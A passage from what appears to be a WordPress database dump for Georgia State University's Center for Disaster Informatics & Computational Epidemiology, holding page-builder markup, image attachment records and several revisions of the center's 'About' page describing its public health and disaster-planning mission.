transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',22,'https://gsudice.dataconn.net/?p=339',0,'revision','',0),(343,1,'2022-02-16 15:56:46','2022-02-16 15:56:46','','visuals-0RPf107BLek-unsplash','','inherit','open','closed','','visuals-0rpf107blek-unsplash','','','2022-02-16 15:56:46','2022-02-16 15:56:46','',122,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/visuals-0RPf107BLek-unsplash.jpg',0,'attachment','image/jpeg',0),(344,1,'2022-02-16 16:00:02','2022-02-16 16:00:02','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":354,\"height\":248,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"354\" height=\"248\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"width\":-440,\"height\":-290} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft is-resized\"><img width=\"-440\" height=\"-290\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services. Collaboration among researchers from Computer Science, Geography (GIS), Public Health, Policy Studies, Biology, etc., is imperative to develop methods capable of addressing the complex and multifaceted problems related to Population Health and Disaster Response Planning. </p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:00:02','2022-02-16 16:00:02','',122,'https://gsudice.dataconn.net/?p=344',0,'revision','',0),(346,1,'2022-02-16 16:01:52','2022-02-16 16:01:52','','cdc','','inherit','open','closed','','cdc','','','2022-02-16 16:01:52','2022-02-16 16:01:52','',122,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc.jpg',0,'attachment','image/jpeg',0),(347,1,'2022-02-16 16:03:46','2022-02-16 16:03:46','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":267,\"height\":187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"267\" height=\"187\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":346,\"width\":245,\"height\":161,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc-1024x677.jpg\" alt=\"\" class=\"wp-image-346\" width=\"245\" height=\"161\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:03:46','2022-02-16 16:03:46','',122,'https://gsudice.dataconn.net/?p=347',0,'revision','',0),(348,1,'2022-02-16 16:03:56','2022-02-16 16:03:56','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":267,\"height\":187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"267\" height=\"187\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":346,\"width\":245,\"height\":161,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc-1024x677.jpg\" alt=\"\" class=\"wp-image-346\" width=\"245\" height=\"161\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p><em>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services.</em></p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:03:56','2022-02-16 16:03:56','',122,'https://gsudice.dataconn.net/?p=348',0,'revision','',0),(351,1,'2022-02-16 18:06:17','2022-02-16 18:06:17','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-02-16 18:06:17','2022-02-16 18:06:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(352,1,'2022-02-16 18:12:20','2022-02-16 18:12:20','','colibri-image-381.png','','inherit','open','closed','','colibri-image-381-png','','','2022-02-16 18:12:20','2022-02-16 18:12:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-381.png',0,'attachment','image/png',0),(353,1,'2022-02-16 18:12:26','2022-02-16 18:12:26','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities.<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','publish','closed','closed','','353','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=353',0,'extb_post_json','',0),(354,1,'2022-02-16 18:12:26','2022-02-16 18:12:26','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c9\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c10\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n                      it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n            <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n            <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-318-outer style-local-122-c39-outer\">\n            <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n                      or health services</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:12:26','2022-02-16 18:12:26','',122,'https://gsudice.dataconn.net/?p=354',0,'revision','',0),(360,1,'2022-02-16 18:14:45','2022-02-16 